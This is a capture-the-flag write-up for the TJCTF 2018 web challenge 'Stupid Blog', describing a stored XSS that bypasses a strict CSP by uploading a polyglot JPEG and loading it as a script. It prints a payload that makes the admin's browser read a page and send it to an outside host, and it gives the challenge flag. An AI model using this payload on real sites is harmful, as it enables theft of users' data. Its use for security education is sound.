+++
title = "Stupid Blog"
description = "TJCTF 2018 - Web (130 pts)"
keywords = "Web, XSS, CSP, Bypass, Polyglot, WriteUp, CTF, Aperi'Kube, Apéri'Kube, AperiKube, ApériKube"
date = 2018-08-07T19:19:25+01:00
weight = 20
draft = false
bref = "TJCTF 2018 - Web (130 pts)"
toc = true
aliases = [
    "/docs/tjctf_2018_stupid_blog",
]
+++

TJCTF 2018: Stupid Blog 
====================================

### Challenge details

| Event      | Challenge     | Category      | Points | Solves      |
|------------|---------------|---------------|--------|-------------|
| TJCTF 2018 | Stupid Blog   | Web           | 130    | 22 solves   |


### Description

Author: okulkarni

> I created this blog site, but it doesn't do much. I did hide a flag on here though. Maybe you can convince the admin user to give it to you?

### TL;DR

Stupid Blog was a stored XSS challenge, where you manage to bypass the CSP using a JPEG file.

### Methology

#### Find the XSS

Once, on the website you have two possibilities, register and login. So I create and account and log me in.

<style>.zimg500 img{height: 500px;}</style>
<center class="zimg500">![1.png](/files/tjctf_2018/stupid_blog/1.png)</center>

After being logged in, three more possibilities, upload a profile picture (JPEG/PNG), set a post on your "blog" and report a user.
Because I had a similar challenge in the EasyCTF ([Fumblr](http://www.aperikube.fr/docs/easyctf_2018/fumblr)), I immediately thought of an XSS.

<center class="zimg500">![2.PNG](/files/tjctf_2018/stupid_blog/2.PNG)</center>

So I tested a XSS in the post, it was well injected, but not executed... The fault of the very strict CSP.

<center>![3.PNG](/files/tjctf_2018/stupid_blog/3.PNG)</center>

```
content-security-policy: default-src 'self'
```

Now, I know that I need to bypass the CSP to execute Javascript on my profile page. So, when I report my account to the admin, he will execute it.

#### Bypass the CSP

Since we have an image upload and a strict CSP to bypass, I thought of an article from [Gareth Heyes](https://twitter.com/garethheyes) on [PortSwigger](https://portswigger.net/blog/bypassing-csp-using-polyglot-jpegs) about that.
So I reused his [PoC image](http://portswigger-labs.net/polyglot/jpeg/xss_within_header_compressed_small_logo.jpg) to bypass the CSP.

His PoC contains among other things, this Javascript:

```
*/=alert("Burp rocks.");/*
```

I replace it with my payload:

```
*/=x=new XMLHttpRequest();x.open("GET","admin",false);x.send(null);document.location="http://drstache.proxy.beeceptor.com/y"+x.responseText;/*
```

The payload will force the *admin* to GET his blog page and send the entire content to [http://drstache.proxy.beeceptor.com](http://drstache.proxy.beeceptor.com).

Next, we need to use the XSS to import our polyglot JPEG as a script, to do so, I post ```<script charset="ISO-8859-1" src="ggg/pfp"></script>``` on my blog.

The last step is to report my user to the *admin*, and wait for him to go on my profile.

<center class="zimg500">![4.PNG](/files/tjctf_2018/stupid_blog/4.PNG)</center>

After a few minutes a request was sent to my beeceptor by the *admin* \o7

<center>![5.PNG](/files/tjctf_2018/stupid_blog/5.PNG)</center>

It contains the whole admin page, the flag was in.

### Flag

**tjctf{1m4g3\_p0lygl0t\_1s\_w3ird}**

*DrStache*
